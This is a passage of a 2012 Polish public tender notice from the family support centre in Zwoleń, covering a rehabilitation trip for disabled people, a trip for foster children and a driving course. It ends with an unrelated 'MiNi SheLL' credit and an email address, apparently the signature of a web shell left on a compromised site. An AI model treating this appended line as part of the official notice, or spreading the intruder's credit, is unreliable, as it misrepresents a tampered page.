<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.25.00-4, 85.14.00.00-2, 92.33.00.00-3, 80.41.10.00-8, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia
Na potwierdzenie spełnienia tego warunku  Wykonawca zobowiązany jest wykazać, że posiada aktualny  na dzień składania ofert i trwania zamówienia wpis do rejestru organizatorów turnusów rehabilitacyjnych prowadzonego przez wojewodę oraz wpis do rejestru ośrodków prowadzonego przez wojewodę   o którym mowa w art. 10c ust.2 ustawy z dnia 27 sierpnia 1997 roku o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób niepełnosprawnych ( Dz. U. z 2010 r. Nr 214, poz. 1407 ze zm.)  Ocena spełnienia tego warunku będzie dokonana w oparciu o złożone wraz z ofertą  oświadczenie, o posiadanym wyżej wpisie. 
Część II zamówienia
Na potwierdzenie spełnienia tego warunku  Wykonawca zobowiązany jest wykazać, że posiada aktualny  na dzień składania ofert i trwania zamówienia  wpis do rejestru ośrodków prowadzonego przez wojewodę   o którym mowa w art. 10c ust.2pkt 2 ustawy z dnia 27 sierpnia 1997 roku o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób niepełnosprawnych ( Dz. U. z 2010 r. Nr 214, poz. 1407 ze zm.)  Ocena spełnienia tego warunku będzie dokonana w oparciu o złożone wraz z ofertą  oświadczenie,  o posiadanym wyżej wpisie
Część III zamówienia
Na potwierdzenie spełnienia tego warunku  Wykonawca zobowiązany jest wykazać, że posiada aktualny  na dzień składania ofert i trwania zamówienia  wpis do rejestru przedsiębiorców prowadzący ośrodki szkolenia kierowców, prowadzonego przez Starostę właściwego ze względu na miejsce wykonywania działalności objętej wpisem zgodnie z art. 103 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym ( Dz. U. z 2005 r. Nr 108, poz. 908 ze zm.)   Ocena spełnienia tego warunku będzie dokonana w oparciu o złożone wraz z ofertą  oświadczenie,  o posiadanym wyżej wpisie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia
Na potwierdzenie spełnienia tego warunku Wykonawca zobowiązany jest udokumentować, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,  wykonał minimum 1 usługę odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia   dla grupy minimum 30 osobowej, osób niepełnosprawnych i ich  opiekunów. Wykonawca zobowiązany jest dołączyć do wykazu dokumenty  ( np. referencje, protokoły odbioru), potwierdzające, że przeprowadzona usługa została wykonana należycie.
Za usługę odpowiadającą rodzajem i wartością usługom stanowiącym przedmiot zamówienia uważa się przygotowanie i przeprowadzenie co najmniej jednego  wyjazdu rehabilitacyjno - integracyjnego wraz z   doradztwem zawodowym z który charakteryzował się: 
- realizacją trwającą minimum 14 dni
- wartością co najmniej 80 000,00 zł. brutto
Część II zamówienia
Na potwierdzenie spełnienia tego warunku Wykonawca zobowiązany jest udokumentować, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,  wykonał minimum 1 usługę odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia   dla minimum grupy   12 osobowej . Wykonawca zobowiązany jest dołączyć do wykazu dokumenty ( np. referencje, protokoły odbioru), potwierdzające, że przeprowadzone usługi zostały wykonane należycie.
Za usługi odpowiadające rodzajem i wartością usługom stanowiącym przedmiot zamówienia uważa się przygotowanie i przeprowadzenie co najmniej jednego wyjazdu integracyjno - szkoleniowego wraz z   doradztwem zawodowym z który charakteryzował się: 
- realizacją trwającą minimum 7 dni
- wartością co najmniej 20 000,00 zł. brutto
Część III zamówienia
Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Warunek ten zostanie spełniony, na podstawie złożonego przez wykonawcę oświadczenia o spełnieniu warunków określonych w art.. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia
Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Warunek ten zostanie spełniony, na podstawie złożonego przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust.1 ustawy Pzp.
Część II zamówienia
Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Warunek ten zostanie spełniony, na podstawie złożonego przez wykonawcę oświadczenia o spełnieniu warunków określonych w art.. 22 ust.1 ustawy Pzp.
Część III zamówienia
Na potwierdzenie spełnienia tego warunku  Wykonawca musi dysponować salą wykładową wyposażoną w sprzęt i pomoce dydaktyczne dla potrzeb szkolenia, spełniającą wymogi o których mowa w § 3 Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w  sprawie szkolenia, egzaminowania  i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów - zgodnie z wzorem stanowiącym Zał. Nr 13 do SIWZ
Posiadania przez Wykonawcę do dyspozycji min 1 samochodu w celu realizacji zamówienia wraz z informacją o sposobie dysponowania tym samochodem - zgodnie z wzorem stanowiącym Zał. Nr 14 do  SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia
Na potwierdzenie spełnienia tego warunku Wykonawca zobowiązany jest wykazać, że dysponuje co najmniej 1 doradcą zawodowym posiadającym uprawnienia, mającym 2-letnie doświadczenie w szkoleniach/warsztatach z osobami niepełnosprawnymi. Na potwierdzenie spełnienia tego warunku, Wykonawca zobowiązany będzie dołączyć do oferty wykaz osób oraz oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia. 
Część II zamówienia
Na potwierdzenie spełnienia tego warunku Wykonawca zobowiązany jest wykazać, że dysponuje co najmniej 1 doradcą zawodowym mającym odpowiednie kwalifikacje i min.  2 - letnie doświadczenie w szkoleniach/warsztatach z dziećmi. Na potwierdzenie spełnienia tego warunku, Wykonawca zobowiązany będzie dołączyć do oferty wykaz osób oraz oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia.
Część III zamówienia
Na potwierdzenie spełnienia tego warunku  Wykonawca musi wykazać, iż dysponuje min. jednym instruktorem, który posiada uprawnienia o których mowa w art. 105 ust. 2 pkt 1-3 ustawy Prawo o ruchu drogowym, wraz z informacjami na temat kwalifikacji zawodowej, doświadczenia niezbędnego do wykonania zamówienia, oraz informację o podstawie do dysponowania tymi osobami, oraz oświadczenie, ze osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla wszystkich Części zamówienia
Na potwierdzenie spełnienia tego warunku Wykonawca zobowiązany jest wykazać, że posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej
działalności związanej z przedmiotem zamówienia  na sumę gwarancyjną nie mniejszą niż 100 000 zł. Ocena spełnienia tego warunku będzie dokonana w oparciu o kompletną i
prawidłowo złożoną wraz z ofertą  polisę  ubezpieczeniową według formuły  spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów;
2. wypełniony formularz ofertowy zgodnie z Zał. Nr 4 - 4b do SIWZ  (stosownie do danej części zamówienia)
3 zobowiązanie  podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia zgodnie z ZAŁ. Nr 17 do SIWZ
4. Oświadczenia Wykonawców o dokonaniu wpisu stosownie do części zamówienia zgodnie z przepisami prawa ZAŁ. Nr 7.8.9</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy mogą być dokonywane w formie pisemnej pod rygorem ich nieważności i są dopuszczalne w granicach określonych w ustawie Prawo zamówień publicznych.
2. Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1) gdy z powodu okoliczności niezależnych od Zamawiającego lub Wykonawcy konieczna będzie zmiana  terminu realizacji zamówienia, Zamawiający na wniosek Wykonawcy może  zmienić termin realizacji zamówienia;
2) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, a zdarzenia stanowiące podstawę zmian wynikły w trakcie realizacji zamówienia;
3) zmianie osób, które będą uczestniczyć w realizacji zamówienia pod warunkiem, że osoba wskazana przez Wykonawcę  do realizacji zamówienia, będzie posiadała kwalifikacje i doświadczenie odpowiadające wymaganiom Zamawiającego określonym w SIWZ po pisemnym zawiadomieniu Zamawiającego, bez konieczności zachowania pisemnej formy  zmiany umowy,
4) zmiana ilości uczestników poszczególnych części zamówienia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.zwolen.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. Wł. Jagiełły 4
26-700 Zwoleń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. Wł. Jagiełły 4
26-700 Zwoleń
pok. Nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie wyjazdu z programem  rehabilitacyjno- integracyjnym dla 45 osób  (30 osób niepełnosprawnych w tym poruszające się na wózkach inwalidzkich i 15 ich opiekunów) ze szkoleniem z zakresu rozwoju aktywności zawodowej i społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14 dniowy   wyjazd z programem  rehabilitacyjno- integracyjnym dla 45 osób  (30 osób niepełnosprawnych w tym poruszające się na wózkach inwalidzkich i 15 ich opiekunów) ze szkoleniem z zakresu rozwoju aktywności zawodowej i społecznej w ilości 30 godzin zajęć zespołowych i 30 godzin indywidualnego doradztwa zawodowego ( po 1 godz. dla każdej osoby niepełnosprawnej).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.25.00-4, 85.14.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie 7 dniowego wyjazd integracyjno - szkoleniowy dla 6 dzieci z rodzin zastępczych i 6 ich opiekunów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: zorganizowanie i przeprowadzenie  7 dniowego wyjazdu integracyjno- szkoleniowego dla 6 dzieci z rodzin zastępczych i 6 ich opiekunów uczestników projektu systemowego My samodzielni realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 92.33.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs prawa jazdy Kat.B dla 10 pełnoletnich osób z rodzin zastępczych i placówek opiekuńczo- wychowawczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: zorganizowanie i przeprowadzenie  kursu prawa jazdy Kat. B dla 10 pełnoletnich osób z rodzin zastępczych i placówek opiekuńczo-wychowawczych uczestników projektu systemowego My samodzielni  realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8, 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com